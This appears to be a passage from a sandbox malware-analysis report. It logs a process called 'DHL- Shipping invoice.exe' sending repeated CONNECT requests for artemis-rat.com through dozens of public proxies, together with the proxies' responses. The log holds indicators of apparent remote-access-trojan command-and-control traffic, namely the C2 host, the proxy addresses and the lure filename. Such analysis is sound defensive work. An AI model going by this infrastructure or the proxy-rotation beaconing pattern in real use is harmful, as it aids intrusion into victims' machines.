                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1828192.168.2.45462095.71.124.18756786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.989079952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1829192.168.2.45535689.35.237.1879996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.001923084 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:12.785200119 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:13.619324923 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1830192.168.2.45545746.17.63.16694806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.002578974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.161787033 CET339INHTTP/1.1 403 Forbidden
                            Server: squid/4.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 5
                            X-Squid-Error: TCP_RESET 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from proxy.wakoopa.com
                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                            Connection: keep-alive
                            Data Raw: 72 65 73 65 74
                            Data Ascii: reset


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1831192.168.2.45539337.230.144.25181186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.005153894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.224525928 CET131INHTTP/1.1 503 Too many open connections
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                            Data Ascii: Maximum number of open connections reached.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1832192.168.2.455348170.84.205.1741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.006577969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1833192.168.2.45545646.17.63.166100006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.006719112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.171578884 CET339INHTTP/1.1 403 Forbidden
                            Server: squid/4.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 5
                            X-Squid-Error: TCP_RESET 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from proxy.wakoopa.com
                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                            Connection: keep-alive
                            Data Raw: 72 65 73 65 74
                            Data Ascii: reset


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1834192.168.2.45545945.87.43.152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.009881020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1835192.168.2.455315103.127.1.130806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.010080099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.387356997 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1836192.168.2.454978192.154.195.7690006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.014827967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1837192.168.2.455337171.244.140.160170816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.056591034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953213930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062917948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1838192.168.2.45543941.231.37.7631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.057677984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:03.920656919 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1839192.168.2.455411154.239.3.18580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.057790995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641010046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.344091892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750108004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.597712040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.344075918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.076402903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.656125069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.682739019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1840192.168.2.455463184.185.2.1241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.058366060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1841192.168.2.45534060.188.102.225180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.058877945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1842192.168.2.455492104.19.217.219806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.059292078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.146641016 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1843192.168.2.455491104.18.237.128806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.059293032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.147802114 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1844192.168.2.45538761.79.73.225806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.059420109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.333110094 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1845192.168.2.45548591.189.177.18631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.071213007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.364590883 CET1286INHTTP/1.1 403 Forbidden
                            Server: squid/5.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3629
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from lb1
                            X-Cache-Lookup: NONE from lb1:3128
                            Via: 1.1 lb1 (squid/5.7)
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1846192.168.2.455447190.113.12.7533896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.072134018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1847192.168.2.453389203.19.38.11410806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.075658083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250157118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250171900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.665728092 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.22.0
                            Date: Tue, 12 Mar 2024 07:37:13 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1848192.168.2.455468213.14.32.7841536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.076030970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1849192.168.2.45536947.114.101.5788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.079796076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.398399115 CET334INHTTP/1.1 400 Bad Request
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 204
                            Connection: close
